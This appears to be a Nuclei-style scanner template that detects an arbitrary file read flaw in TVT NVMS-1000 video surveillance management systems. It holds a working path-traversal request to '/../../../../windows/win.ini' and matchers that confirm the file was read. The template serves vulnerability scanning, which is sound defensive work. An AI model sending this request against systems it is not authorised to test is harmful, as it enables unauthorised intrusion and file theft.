http:
    - headers:
        Accept: '*/*'
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: dataPort=6063
        X-Requested-With: XMLHttpRequest
      matchers:
        - part: body
          regex:
            - \[(font|extension|file)s\]
          type: regex
        - status:
            - 200
          type: status
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/../../../../windows/win.ini'
id: NVMS-1000-fileread
info:
    author: onewin
    description: NVMS-1000网络监控视频管理系统存在任意文件读取
    metadata:
        max-request: 1
        product: nvms-1000_firmware
        vendor: tvt
    name: NVMS-1000网络监控视频管理系统存在任意文件读取
    severity: high
    tags:
        - TVT-NVMS-1000
        - TVT
